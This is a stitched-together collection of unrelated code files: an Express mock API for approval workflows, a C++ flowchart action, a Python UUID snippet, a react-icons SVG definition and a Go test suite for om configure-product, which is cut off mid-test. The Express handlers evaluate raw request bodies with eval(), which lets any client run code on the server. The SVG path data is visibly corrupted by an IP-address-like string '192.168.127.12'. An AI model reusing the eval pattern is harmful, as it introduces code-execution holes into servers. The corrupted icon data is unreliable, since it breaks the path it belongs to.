req.on('data',function(data){
var datas = eval("("+data+")");
datas['id'] = id;
Backdatas = _.clone(datas['apply_form']);
Backdatas.id = id;
var DataList = eval('('+fs.readFileSync('routers/files/process-list.json')+')');
var newData = _.clone(DataList["data"]['item']['approvelist']);
newData.unshift(datas);
DataList['data']['item']['approvelist'] = newData;
fs.writeFile('routers/files/process-list.json',JSON.stringify(_.clone(DataList)),function(err){
if(err) console.log(err)
})
res.writeHead(200, { 'Content-Type': 'application/json' });
res.end(JSON.stringify({code:0,data:{item:Backdatas},systime:Date.parse(new Date())}));
next()
})
})
//读取流程
router.route('/spms/approveapply/submit/:id')
.all(function(req,res,next){
next();
})
.get(function(req,res,next){
var url = req.url.split('/');
var id = url[url.length-1];
res.writeHead(200, { 'Content-Type': 'application/json' });
var data = fs.readFileSync('routers/files/process-list.json');
var datas = eval("("+data+")");
_.each(datas["data"]["item"]['approvelist'],function(item){
if(id==item["id"]){
res.end(JSON.stringify({code:0,data:{item:item},systime:Date.parse(new Date())}));
next();
}
})
})
.put(function(req,res,next){
var url = req.url.split('/');
var id = url[url.length-1];
var Backdatas = {};
req.on('data',function(data){
var datas = eval("("+data+")");
var DataList = eval('('+fs.readFileSync('routers/files/process-list.json')+')');
var nowData = _.clone(DataList['data']['item']['approvelist']);
// console.log(nowData);
_.each(nowData,function(item){
if(item["id"] == datas["id"]){
_.extend(item,datas)
}
})
// console.log(JSON.stringify(_.clone(DataList)));
DataList['data']['item']['approvelist'] = nowData
Backdatas = _.clone(datas);
console.log(Backdatas)
// Backdatas.obj_id = Backdatas.id;
fs.writeFile('routers/files/process-list.json',JSON.stringify(_.clone(DataList)),function(err){
if(err) console.log(err)
})
console.log({code:0,data:{item:Backdatas},systime:Date.parse(new Date())});
res.writeHead(200, { 'Content-Type': 'application/json' });
res.end(JSON.stringify({code:0,data:{item:Backdatas},systime:Date.parse(new Date())}));
next()
})
// req.on('end',function(data){
// })
})
//读取流程审批记录
router.route('/spms/approve/record/')
.all(function(req,res,next){
next();
})
.get(function(req,res,next){
var url = req.url.split('/');
var id = url[url.length-1];
res.writeHead(200, { 'Content-Type': 'application/json' });
var data = fs.readFileSync('routers/files/process-record-list.json');
var datas = eval("("+data+")");
res.end(JSON.stringify(eval("("+data+")")));
next();
})
//同意或退回
router.route('/spms/approve/approve')
.all(function(req,res,next){
next();
})
.post(function(req, res, next){
var id = parseInt(Math.random(0,100)*100)+''+parseInt(Math.random(0,100)*100)+''+parseInt(Math.random(0,100)*100);
var Backdatas = {};
req.on('data',function(data){
var datas = eval("("+data+")");
datas['id'] = id;
var DataList = eval('('+fs.readFileSync('routers/files/process-record-list.json')+')');
var newData = _.clone(DataList["data"]['list']);
newData.unshift(datas);
DataList['data']['list'] = newData
Backdatas = _.clone(datas)
fs.writeFile('routers/files/process-record-list.json',JSON.stringify(_.clone(DataList)),function(err){
if(err) console.log(err)
})
})
res.writeHead(200, { 'Content-Type': 'application/json' });
res.end(JSON.stringify({code:0,data:Backdatas,systime:Date.parse(new Date())}));
next()
})
//读取是否有草稿 基本信息没有草稿,计划任务没有草稿 0: 没有;1:项目有;2:任务计划有
router.route('/spms/project/:id/hasdraft')
.all(function(req,res,next){
next();
})
.get(function(req,res,next){
res.end(JSON.stringify({code:0,data:{item:{id:'testpid',hasdraft:1}},systime:Date.parse(new Date())}));
next();
})
|
<gh_stars>0
#include "Add_Write_Stat.h"
#include"..\Statements\Write_Stat.h"
Add_Write_Stat::Add_Write_Stat(ApplicationManager *pAppManager)
:Action(pAppManager)
{
txt = "";
draw = true;
redo = false;
}
void Add_Write_Stat::ReadActionParameters()
{
Output *pOut = pManager->GetOutput();
Input *pIn = pManager->GetInput();
pOut->PrintMessage("writing Statement: Click to add the statement");
if (!pIn->GetPointClicked(inlet)){
txt = "Print ";
return;
}
pOut->PrintMessage("now enter the variables that will be read from the user in this way Iden1,Iden2,..");
txt = "Print " + pIn->GetIdentifiers(txt, pOut, v1);
if (txt == "Print ")
return;
pIn->set_Read_Write_Dim(txt, width, height, t_width, t_height, factor); //for setting the dimensions of the statement
//width,height,t_width,t_height are passed by reference to be calculated then returned
Point lcorner;
pIn->calc_Read_corner(inlet, lcorner, width, factor);
int count = 0;
string str;
while ((!pIn->candraw(lcorner, pManager, height, width) && count != 11) || (pIn->intersect_with_connector(height, width, lcorner, pManager))){
str = to_string(count);
pOut->PrintMessage("choose another position to draw Error counter:" + str + " becareful error count max =10");
if (!pIn->GetPointClicked(inlet)){
txt = "Print ";
return;
}
pIn->calc_Read_corner(inlet, lcorner, width, factor);
count++;
draw = pIn->candraw(lcorner, pManager, height, width);
}
if (count != 11)
pOut->PrintMessage("statement added correctly");
}
void Add_Write_Stat::Execute()
{
Output *pOut = pManager->GetOutput();
Input *pIn = pManager->GetInput();
ReadActionParameters();
if (txt == "Print " || !draw){
pOut->PrintMessage("the statement is empty, this isn't allowed try to add again");
SetUndo(false);
return;
}
else
{
write = new Write_Stat(pManager, txt, inlet, v1, width, height, t_width, t_height, factor);
pManager->AddStatement(write);
}
}
void Add_Write_Stat::undo()
{
if (!redo){
pManager->RemoveStatment(write);
redo = true;
}
else{
pManager->AddStatement(write);
redo = false;
}
}
|
import uuid
def generateUniqueId():
return str(uuid.uuid4())
uniqueId = generateUniqueId()
print(uniqueId)
|
<filename>node_modules/react-icons-kit/md/ic_directions_outline.js<gh_stars>0
"use strict";
Object.defineProperty(exports, "__esModule", {
value: true
});
exports.ic_directions_outline = void 0;
var ic_directions_outline = {
"viewBox": "0 0 24 24",
"children": [{
"name": "path",
"attribs": {
"d": "M0 0h24v24H0V0z",
"fill": "none"
},
"children": []
}, {
"name": "path",
"attribs": {
"d": "M22.43 10.59l-9.01-9.01c-.75-.75-2.07-.76-2.83 0l-9 9c-.78.78-.78 2.04 0 2.82l9 9c.39.39.9.58 192.168.127.12 0 1.02-.19 1.41-.58l8.99-8.99c.79-.76.8-2.02.03-2.82zm-10.42 10.4l-9-9 9-9 9 9-9 9zM8 11v4h2v-3h4v2.5l3.5-3.5L14 7.5V10H9c-.55 0-1 .45-1 1z"
},
"children": []
}]
};
exports.ic_directions_outline = ic_directions_outline;
|
package commands_test
import (
"encoding/json"
"errors"
"fmt"
"io/ioutil"
"os"
"github.com/pivotal-cf/om/api"
"github.com/pivotal-cf/om/commands"
"github.com/pivotal-cf/om/commands/fakes"
. "github.com/onsi/ginkgo"
. "github.com/onsi/gomega"
)
var _ = Describe("ConfigureProduct", func() {
Describe("Execute", func() {
var (
service *fakes.ConfigureProductService
logger *fakes.Logger
config string
configFile *os.File
err error
)
BeforeEach(func() {
service = &fakes.ConfigureProductService{}
logger = &fakes.Logger{}
})
JustBeforeEach(func() {
configFile, err = ioutil.TempFile("", "config.yml")
Expect(err).ToNot(HaveOccurred())
defer configFile.Close()
_, err = configFile.WriteString(config)
Expect(err).ToNot(HaveOccurred())
})
When("product properties are provided", func() {
BeforeEach(func() {
config = fmt.Sprintf(`{"product-name": "cf", "product-properties": %s}`, productProperties)
})
It("configures the given product's properties", func() {
client := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
service.ListStagedProductsReturns(api.StagedProductsOutput{
Products: []api.StagedProduct{
{GUID: "some-product-guid", Type: "cf"},
{GUID: "not-the-guid-you-are-looking-for", Type: "something-else"},
},
}, nil)
err := executeCommand(client, []string{
"--config", configFile.Name(),
})
Expect(err).ToNot(HaveOccurred())
Expect(service.ListStagedProductsCallCount()).To(Equal(1))
actual := service.UpdateStagedProductPropertiesArgsForCall(0)
Expect(actual.GUID).To(Equal("some-product-guid"))
Expect(actual.Properties).To(MatchJSON(productProperties))
format, content := logger.PrintfArgsForCall(0)
Expect(fmt.Sprintf(format, content...)).To(Equal("configuring cf..."))
format, content = logger.PrintfArgsForCall(1)
Expect(fmt.Sprintf(format, content...)).To(Equal("setting properties"))
format, content = logger.PrintfArgsForCall(2)
Expect(fmt.Sprintf(format, content...)).To(Equal("finished setting properties"))
format, content = logger.PrintfArgsForCall(3)
Expect(fmt.Sprintf(format, content...)).To(Equal("finished configuring product"))
})
It("check configuration is complete after configuring", func() {
client := commands.NewConfigureProduct(func() []string { return nil }, service, "example.com", logger)
service.ListStagedProductsReturns(api.StagedProductsOutput{
Products: []api.StagedProduct{
{GUID: "some-product-guid", Type: "cf"},
{GUID: "not-the-guid-you-are-looking-for", Type: "something-else"},
},
}, nil)
service.ListStagedPendingChangesReturns(api.PendingChangesOutput{
ChangeList: []api.ProductChange{
{
GUID: "some-product-guid",
Action: "install",
Errands: nil,
CompletenessChecks: &api.CompletenessChecks{
ConfigurationComplete: false,
StemcellPresent: false,
ConfigurablePropertiesValid: true,
},
},
},
}, nil)
err := executeCommand(client, []string{
"--config", configFile.Name(),
})
Expect(err).To(HaveOccurred())
Expect(err).To(MatchError("configuration not complete.\nThe properties you provided have been set,\nbut some required properties or configuration details are still missing.\nVisit the Ops Manager for details: example.com"))
Expect(service.ListStagedProductsCallCount()).To(Equal(1))
actual := service.UpdateStagedProductPropertiesArgsForCall(0)
Expect(actual.GUID).To(Equal("some-product-guid"))
Expect(actual.Properties).To(MatchJSON(productProperties))
Expect(service.ListStagedPendingChangesCallCount()).To(Equal(1))
})
It("returns a helpful error message if configuration completeness cannot be validated", func() {
client := commands.NewConfigureProduct(func() []string { return nil }, service, "example.com", logger)
service.ListStagedProductsReturns(api.StagedProductsOutput{
Products: []api.StagedProduct{
{GUID: "some-product-guid", Type: "cf"},
{GUID: "not-the-guid-you-are-looking-for", Type: "something-else"},
},
}, nil)
service.ListStagedPendingChangesReturns(api.PendingChangesOutput{
ChangeList: []api.ProductChange{
{
GUID: "some-product-guid",
Action: "install",
Errands: nil,
CompletenessChecks: nil,
},
},
}, nil)
err := executeCommand(client, []string{
"--config", configFile.Name(),
})
Expect(err).To(HaveOccurred())
Expect(err).To(MatchError("configuration completeness could not be determined.\nThis feature is only supported for OpsMan 2.2+\nIf you're on older version of OpsMan add the line `validate-config-complete: false` to your config file."))
Expect(service.ListStagedProductsCallCount()).To(Equal(1))
actual := service.UpdateStagedProductPropertiesArgsForCall(0)
Expect(actual.GUID).To(Equal("some-product-guid"))
Expect(actual.Properties).To(MatchJSON(productProperties))
Expect(service.ListStagedPendingChangesCallCount()).To(Equal(1))
})
})
When("product network is provided", func() {
BeforeEach(func() {
config = fmt.Sprintf(`{"product-name": "cf", "network-properties": %s}`, networkProperties)
})
It("configures a product's network", func() {
client := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
service.ListStagedProductsReturns(api.StagedProductsOutput{
Products: []api.StagedProduct{
{GUID: "some-product-guid", Type: "cf"},
{GUID: "not-the-guid-you-are-looking-for", Type: "something-else"},
},
}, nil)
err := executeCommand(client, []string{
"--config", configFile.Name(),
})
Expect(err).ToNot(HaveOccurred())
Expect(service.ListStagedProductsCallCount()).To(Equal(1))
actual := service.UpdateStagedProductNetworksAndAZsArgsForCall(0)
Expect(actual.GUID).To(Equal("some-product-guid"))
Expect(actual.NetworksAndAZs).To(MatchJSON(networkProperties))
format, content := logger.PrintfArgsForCall(0)
Expect(fmt.Sprintf(format, content...)).To(Equal("configuring cf..."))
format, content = logger.PrintfArgsForCall(1)
Expect(fmt.Sprintf(format, content...)).To(Equal("setting up network"))
format, content = logger.PrintfArgsForCall(2)
Expect(fmt.Sprintf(format, content...)).To(Equal("finished setting up network"))
format, content = logger.PrintfArgsForCall(3)
Expect(fmt.Sprintf(format, content...)).To(Equal("finished configuring product"))
})
})
When("product syslog is provided", func() {
BeforeEach(func() {
config = fmt.Sprintf(`{"product-name": "cf", "syslog-properties": %s}`, syslogProperties)
})
It("configures a product's syslog", func() {
client := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
service.ListStagedProductsReturns(api.StagedProductsOutput{
Products: []api.StagedProduct{
{GUID: "some-product-guid", Type: "cf"},
{GUID: "not-the-guid-you-are-looking-for", Type: "something-else"},
},
}, nil)
err := executeCommand(client, []string{
"--config", configFile.Name(),
})
Expect(err).ToNot(HaveOccurred())
Expect(service.ListStagedProductsCallCount()).To(Equal(1))
actual := service.UpdateSyslogConfigurationArgsForCall(0)
Expect(actual.GUID).To(Equal("some-product-guid"))
Expect(actual.SyslogConfiguration).To(MatchJSON(syslogProperties))
format, content := logger.PrintfArgsForCall(0)
Expect(fmt.Sprintf(format, content...)).To(Equal("configuring cf..."))
format, content = logger.PrintfArgsForCall(1)
Expect(fmt.Sprintf(format, content...)).To(Equal("setting up syslog"))
format, content = logger.PrintfArgsForCall(2)
Expect(fmt.Sprintf(format, content...)).To(Equal("finished setting up syslog"))
format, content = logger.PrintfArgsForCall(3)
Expect(fmt.Sprintf(format, content...)).To(Equal("finished configuring product"))
})
})
When("product resources are provided", func() {
BeforeEach(func() {
config = fmt.Sprintf(`{"product-name": "cf", "resource-config": %s}`, resourceConfig)
})
It("configures the resource that is provided", func() {
client := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
service.ListStagedProductsReturns(api.StagedProductsOutput{
Products: []api.StagedProduct{
{GUID: "some-product-guid", Type: "cf"},
{GUID: "not-the-guid-you-are-looking-for", Type: "something-else"},
},
}, nil)
service.ListStagedProductJobsReturns(map[string]string{
"some-job": "a-guid",
"some-other-job": "a-different-guid",
"bad": "do-not-use",
}, nil)
err := executeCommand(client, []string{
"--config", configFile.Name(),
})
Expect(err).ToNot(HaveOccurred())
Expect(service.ListStagedProductsCallCount()).To(Equal(1))
Expect(service.ListStagedProductJobsArgsForCall(0)).To(Equal("some-product-guid"))
Expect(service.ConfigureJobResourceConfigCallCount()).To(Equal(1))
productGUID, userConfig := service.ConfigureJobResourceConfigArgsForCall(0)
Expect(productGUID).To(Equal("some-product-guid"))
payload, err := json.Marshal(userConfig)
Expect(err).ToNot(HaveOccurred())
Expect(payload).To(MatchJSON(`{
"some-job": {
"persistent_disk": {"size_mb": "20480"},
"elb_names": ["some-lb"],
"instance_type": {"id": "m1.medium"},
"instances": 1,
"internet_connected": true,
"max_in_flight": "20%"
},
"some-other-job": {
"persistent_disk": {"size_mb": "20480"},
"instance_type": {"id": "m1.medium"},
"max_in_flight": 1
}
}`))
format, content := logger.PrintfArgsForCall(0)
Expect(fmt.Sprintf(format, content...)).To(Equal("configuring cf..."))
format, content = logger.PrintfArgsForCall(1)
Expect(fmt.Sprintf(format, content...)).To(Equal("applying resource configurations..."))
format, content = logger.PrintfArgsForCall(2)
Expect(fmt.Sprintf(format, content...)).To(Equal("finished applying resource configurations"))
})
It("sets the max in flight for all jobs", func() {
client := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
service.ListStagedProductsReturns(api.StagedProductsOutput{
Products: []api.StagedProduct{
{GUID: "some-product-guid", Type: "cf"},
{GUID: "not-the-guid-you-are-looking-for", Type: "something-else"},
},
}, nil)
service.ListStagedProductJobsReturns(map[string]string{
"some-job": "a-guid",
"some-other-job": "a-different-guid",
"bad": "do-not-use",
}, nil)
err := executeCommand(client, []string{
"--config", configFile.Name(),
})
Expect(err).ToNot(HaveOccurred())
Expect(service.UpdateStagedProductJobMaxInFlightCallCount()).To(Equal(1))
productGUID, payload := service.UpdateStagedProductJobMaxInFlightArgsForCall(0)
Expect(productGUID).To(Equal("some-product-guid"))
Expect(payload).To(Equal(map[string]interface{}{
"a-guid": "20%",
"a-different-guid": 1,
}))
format, content := logger.PrintfArgsForCall(3)
Expect(fmt.Sprintf(format, content...)).To(Equal("applying max in flight for the following jobs:"))
})
})
When("interpolating", func() {
var (
configFile *os.File
err error
)
BeforeEach(func() {
service.ListStagedProductsReturns(api.StagedProductsOutput{
Products: []api.StagedProduct{
{GUID: "some-product-guid", Type: "cf"},
{GUID: "not-the-guid-you-are-looking-for", Type: "something-else"},
},
}, nil)
service.ListStagedProductJobsReturns(map[string]string{
"some-job": "a-guid",
"some-other-job": "a-different-guid",
"bad": "do-not-use",
}, nil)
})
AfterEach(func() {
os.RemoveAll(configFile.Name())
})
When("the config file contains variables", func() {
Context("passed in a vars-file", func() {
It("can interpolate variables into the configuration", func() {
client := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
configFile, err = ioutil.TempFile("", "")
Expect(err).ToNot(HaveOccurred())
_, err = configFile.WriteString(productPropertiesWithVariableTemplate)
Expect(err).ToNot(HaveOccurred())
varsFile, err := ioutil.TempFile("", "")
Expect(err).ToNot(HaveOccurred())
_, err = varsFile.WriteString(`password: <PASSWORD>`)
Expect(err).ToNot(HaveOccurred())
err = executeCommand(client, []string{
"--config", configFile.Name(),
"--vars-file", varsFile.Name(),
})
Expect(err).ToNot(HaveOccurred())
})
})
Context("given vars", func() {
It("can interpolate variables into the configuration", func() {
client := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
configFile, err = ioutil.TempFile("", "")
Expect(err).ToNot(HaveOccurred())
_, err = configFile.WriteString(productPropertiesWithVariableTemplate)
Expect(err).ToNot(HaveOccurred())
err = executeCommand(client, []string{
"--config", configFile.Name(),
"--var", "password=<PASSWORD>",
})
Expect(err).ToNot(HaveOccurred())
})
})
Context("passed as environment variables", func() {
It("can interpolate variables into the configuration", func() {
client := commands.NewConfigureProduct(func() []string { return []string{"OM_VAR_password=<PASSWORD>"} }, service, "", logger)
configFile, err = ioutil.TempFile("", "")
Expect(err).ToNot(HaveOccurred())
_, err = configFile.WriteString(productPropertiesWithVariableTemplate)
Expect(err).ToNot(HaveOccurred())
err = executeCommand(client, []string{
"--config", configFile.Name(),
"--vars-env", "OM_VAR",
})
Expect(err).ToNot(HaveOccurred())
})
It("supports the experimental feature of OM_VARS_ENV", func() {
os.Setenv("OM_VARS_ENV", "OM_VAR")
defer os.Unsetenv("OM_VARS_ENV")
client := commands.NewConfigureProduct(func() []string { return []string{"OM_VAR_password=<PASSWORD>"} }, service, "", logger)
configFile, err = ioutil.TempFile("", "")
Expect(err).ToNot(HaveOccurred())
_, err = configFile.WriteString(productPropertiesWithVariableTemplate)
Expect(err).ToNot(HaveOccurred())
err = executeCommand(client, []string{
"--config", configFile.Name(),
})
Expect(err).ToNot(HaveOccurred())
})
})
It("returns an error if missing variables", func() {
client := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
configFile, err = ioutil.TempFile("", "")
Expect(err).ToNot(HaveOccurred())
_, err = configFile.WriteString(productPropertiesWithVariableTemplate)
Expect(err).ToNot(HaveOccurred())
err = executeCommand(client, []string{
"--config", configFile.Name(),
})
Expect(err).To(MatchError(ContainSubstring("Expected to find variables")))
})
})
When("an ops-file is provided", func() {
It("can interpolate ops-files into the configuration", func() {
client := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
configFile, err = ioutil.TempFile("", "")
Expect(err).ToNot(HaveOccurred())
_, err = configFile.WriteString(ymlProductProperties)
Expect(err).ToNot(HaveOccurred())
opsFile, err := ioutil.TempFile("", "")
Expect(err).ToNot(HaveOccurred())
_, err = opsFile.WriteString(productOpsFile)
Expect(err).ToNot(HaveOccurred())
err = executeCommand(client, []string{
"--config", configFile.Name(),
"--ops-file", opsFile.Name(),
})
Expect(err).ToNot(HaveOccurred())
Expect(service.ListStagedProductsCallCount()).To(Equal(1))
Expect(service.UpdateStagedProductPropertiesCallCount()).To(Equal(1))
Expect(service.UpdateStagedProductPropertiesArgsForCall(0).GUID).To(Equal("some-product-guid"))
Expect(service.UpdateStagedProductPropertiesArgsForCall(0).Properties).To(MatchJSON(productPropertiesWithOpsFileInterpolated))
})
It("returns an error if the ops file is invalid", func() {
client := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
configFile, err = ioutil.TempFile("", "")
Expect(err).ToNot(HaveOccurred())
_, err = configFile.WriteString(ymlProductProperties)
Expect(err).ToNot(HaveOccurred())
opsFile, err := ioutil.TempFile("", "")
Expect(err).ToNot(HaveOccurred())
_, err = opsFile.WriteString(`%%%`)
Expect(err).ToNot(HaveOccurred())
err = executeCommand(client, []string{
"-c", configFile.Name(),
"-o", opsFile.Name(),
})
Expect(err).To(MatchError(ContainSubstring("could not find expected directive name")))
})
})
})
When("GetStagedProductJobResourceConfig returns an error", func() {
BeforeEach(func() {
config = fmt.Sprintf(`{"product-name": "cf", "resource-config": %s}`, resourceConfig)
})
It("returns an error", func() {
client := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
service.ListStagedProductsReturns(api.StagedProductsOutput{
Products: []api.StagedProduct{
{GUID: "some-product-guid", Type: "cf"},
{GUID: "not-the-guid-you-are-looking-for", Type: "something-else"},
},
}, nil)
service.ListStagedProductJobsReturns(map[string]string{
"some-job": "a-guid",
"some-other-job": "a-different-guid",
"bad": "do-not-use",
}, nil)
service.ConfigureJobResourceConfigReturns(errors.New("some error"))
err := executeCommand(client, []string{
"--config", configFile.Name(),
})
Expect(err).To(MatchError("failed to configure resources: some error"))
})
})
When("certain fields are not provided in the config", func() {
BeforeEach(func() {
config = `{"product-name": "cf"}`
service.ListStagedProductsReturns(api.StagedProductsOutput{
Products: []api.StagedProduct{
{GUID: "some-product-guid", Type: "cf"},
},
}, nil)
})
It("logs and then does nothing if they are empty", func() {
command := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
err := executeCommand(command, []string{
"--config", configFile.Name(),
})
Expect(err).ToNot(HaveOccurred())
Expect(service.ListStagedProductsCallCount()).To(Equal(1))
Expect(logger.PrintlnCallCount()).To(Equal(6))
msg := logger.PrintlnArgsForCall(0)[0]
Expect(msg).To(Equal("network properties are not provided, nothing to do here"))
msg = logger.PrintlnArgsForCall(1)[0]
Expect(msg).To(Equal("product properties are not provided, nothing to do here"))
msg = logger.PrintlnArgsForCall(2)[0]
Expect(msg).To(Equal("resource config properties are not provided, nothing to do here"))
msg = logger.PrintlnArgsForCall(3)[0]
Expect(msg).To(Equal("max in flight properties are not provided, nothing to do here"))
msg = logger.PrintlnArgsForCall(4)[0]
Expect(msg).To(Equal("syslog configuration is not provided, nothing to do here"))
msg = logger.PrintlnArgsForCall(5)[0]
Expect(msg).To(Equal("errands are not provided, nothing to do here"))
format, content := logger.PrintfArgsForCall(1)
Expect(fmt.Sprintf(format, content...)).To(ContainSubstring("finished configuring product"))
})
})
When("there is a running installation", func() {
BeforeEach(func() {
service.ListInstallationsReturns([]api.InstallationsServiceOutput{
{
ID: 999,
Status: "running",
Logs: "",
StartedAt: nil,
FinishedAt: nil,
UserName: "admin",
},
}, nil)
config = `{"product-name": "cf"}`
})
It("returns an error", func() {
client := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
err := executeCommand(client, []string{"--config", configFile.Name()})
Expect(err).To(MatchError("OpsManager does not allow configuration or staging changes while apply changes are running to prevent data loss for configuration and/or staging changes"))
Expect(service.ListInstallationsCallCount()).To(Equal(1))
})
})
When("product-version is provided in the config", func() {
BeforeEach(func() {
config = fmt.Sprintf(`{
"product-name": "cf",
"product-properties": %s,
"product-version": 1.2.3
}`, productProperties)
})
It("does not return an error", func() {
client := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
service.ListStagedProductsReturns(api.StagedProductsOutput{
Products: []api.StagedProduct{
{GUID: "some-product-guid", Type: "cf"},
{GUID: "not-the-guid-you-are-looking-for", Type: "something-else"},
},
}, nil)
err := executeCommand(client, []string{
"--config", configFile.Name(),
})
Expect(err).ToNot(HaveOccurred())
})
})
When("an error occurs", func() {
BeforeEach(func() {
config = `{"product-name": "cf"}`
})
When("the product does not exist", func() {
It("returns an error", func() {
command := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
service.ListStagedProductsReturns(api.StagedProductsOutput{
Products: []api.StagedProduct{
{GUID: "not-the-guid-you-are-looking-for", Type: "something-else"},
},
}, nil)
err := executeCommand(command, []string{
"--config", configFile.Name(),
})
Expect(err).To(MatchError(`could not find product "cf"`))
})
})
When("the product resources cannot be decoded", func() {
BeforeEach(func() {
config = `{"product-name": "cf", "resource-config": "%%%%%"}`
})
It("returns an error", func() {
command := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
service.ListStagedProductsReturns(api.StagedProductsOutput{
Products: []api.StagedProduct{
{GUID: "some-product-guid", Type: "cf"},
},
}, nil)
err := executeCommand(command, []string{"--config", configFile.Name()})
Expect(err).To(MatchError(ContainSubstring("could not be parsed as valid configuration: yaml: unmarshal errors")))
})
})
When("the jobs cannot be fetched", func() {
BeforeEach(func() {
config = fmt.Sprintf(`{"product-name": "cf", "resource-config": %s}`, resourceConfig)
})
It("returns an error", func() {
command := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
service.ListStagedProductsReturns(api.StagedProductsOutput{
Products: []api.StagedProduct{
{GUID: "some-product-guid", Type: "cf"},
},
}, nil)
service.ListStagedProductJobsReturns(
map[string]string{
"some-job": "a-guid",
}, errors.New("boom"))
err := executeCommand(command, []string{"--config", configFile.Name()})
Expect(err).To(MatchError("failed to fetch jobs: boom"))
})
})
When("the product-name is missing from config", func() {
BeforeEach(func() {
config = `{}`
})
It("returns an error", func() {
command := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
err := executeCommand(command, []string{"--config", configFile.Name()})
Expect(err).To(MatchError("could not parse configure-product config: \"product-name\" is required"))
})
})
When("the --config flag is passed", func() {
When("the provided config path does not exist", func() {
It("returns an error", func() {
command := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
service.ListStagedProductsReturns(api.StagedProductsOutput{
Products: []api.StagedProduct{
{GUID: "some-product-guid", Type: "cf"},
},
}, nil)
err := executeCommand(command, []string{"--config", "some/non-existant/path.yml"})
Expect(err).To(MatchError(ContainSubstring("open some/non-existant/path.yml: no such file or directory")))
})
})
When("the provided config file is not valid yaml", func() {
var (
configFile *os.File
err error
)
AfterEach(func() {
os.RemoveAll(configFile.Name())
})
It("returns an error", func() {
invalidConfig := "this is not a valid config"
client := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
service.ListStagedProductsReturns(api.StagedProductsOutput{
Products: []api.StagedProduct{
{GUID: "some-product-guid", Type: "cf"},
},
}, nil)
configFile, err = ioutil.TempFile("", "")
Expect(err).ToNot(HaveOccurred())
_, err = configFile.WriteString(invalidConfig)
Expect(err).ToNot(HaveOccurred())
err = executeCommand(client, []string{"--config", configFile.Name()})
Expect(err).To(MatchError(ContainSubstring("could not be parsed as valid configuration")))
os.RemoveAll(configFile.Name())
})
})
})
When("the properties cannot be configured", func() {
BeforeEach(func() {
config = `{"product-name": "some-product", "product-properties": {}, "network-properties": {}}`
})
It("returns an error", func() {
command := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
service.UpdateStagedProductPropertiesReturns(errors.New("some product error"))
service.ListStagedProductsReturns(api.StagedProductsOutput{
Products: []api.StagedProduct{
{GUID: "some-product-guid", Type: "some-product"},
},
}, nil)
err := executeCommand(command, []string{"--config", configFile.Name()})
Expect(err).To(MatchError("failed to configure product: some product error"))
})
})
When("the networks cannot be configured", func() {
BeforeEach(func() {
config = `{"product-name": "some-product", "product-properties": {}, "network-properties": {}}`
})
It("returns an error", func() {
command := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
service.UpdateStagedProductNetworksAndAZsReturns(errors.New("some product error"))
service.ListStagedProductsReturns(api.StagedProductsOutput{
Products: []api.StagedProduct{
{GUID: "some-product-guid", Type: "some-product"},
},
}, nil)
err := executeCommand(command, []string{"--config", configFile.Name()})
Expect(err).To(MatchError("failed to configure product: some product error"))
})
})
When("the syslog cannot be configured", func() {
BeforeEach(func() {
config = `{"product-name": "some-product", "product-properties": {}, "syslog-properties": {}}`
})
It("returns an error", func() {
command := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
service.UpdateSyslogConfigurationReturns(errors.New("some product error"))
service.ListStagedProductsReturns(api.StagedProductsOutput{
Products: []api.StagedProduct{
{GUID: "some-product-guid", Type: "some-product"},
},
}, nil)
err := executeCommand(command, []string{"--config", configFile.Name()})
Expect(err).To(MatchError("failed to configure product: some product error"))
})
})
When("when the syslog cannot be configured", func() {
BeforeEach(func() {
config = `{"product-name": "some-product", "product-properties": {}, "syslog-properties": {}}`
})
It("returns an error", func() {
command := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
service.UpdateSyslogConfigurationReturns(errors.New("some product error"))
service.ListStagedProductsReturns(api.StagedProductsOutput{
Products: []api.StagedProduct{
{GUID: "some-product-guid", Type: "some-product"},
},
}, nil)
err := executeCommand(command, []string{"--config", configFile.Name()})
Expect(err).To(MatchError("failed to configure product: some product error"))
})
})
When("errand config errors", func() {
var (
configFile *os.File
err error
)
BeforeEach(func() {
service.ListStagedProductsReturns(api.StagedProductsOutput{
Products: []api.StagedProduct{
{GUID: "some-product-guid", Type: "cf"},
{GUID: "not-the-guid-you-are-looking-for", Type: "something-else"},
},
}, nil)
})
AfterEach(func() {
os.RemoveAll(configFile.Name())
})
It("errors when calling api", func() {
service.UpdateStagedProductErrandsReturns(errors.New("error configuring errand"))
client := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
configFile, err = ioutil.TempFile("", "")
Expect(err).ToNot(HaveOccurred())
_, err = configFile.WriteString(errandConfigFile)
Expect(err).ToNot(HaveOccurred())
err = executeCommand(client, []string{
"--config", configFile.Name(),
})
Expect(err).To(MatchError("failed to set errand state for errand push-usage-service: error configuring errand"))
})
})
Context("with unrecognized top-level-keys", func() {
It("returns error saying the specified key", func() {
configYAML := `{"product-name": "cf", "unrecognized-other-key": {}, "unrecognized-key": {"some-attr1": "some-val1"}}`
configFile, err := ioutil.TempFile("", "config.yaml")
Expect(err).ToNot(HaveOccurred())
_, err = configFile.WriteString(configYAML)
Expect(err).ToNot(HaveOccurred())
Expect(configFile.Close()).ToNot(HaveOccurred())
client := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
err = executeCommand(client, []string{
"--config", configFile.Name(),
})
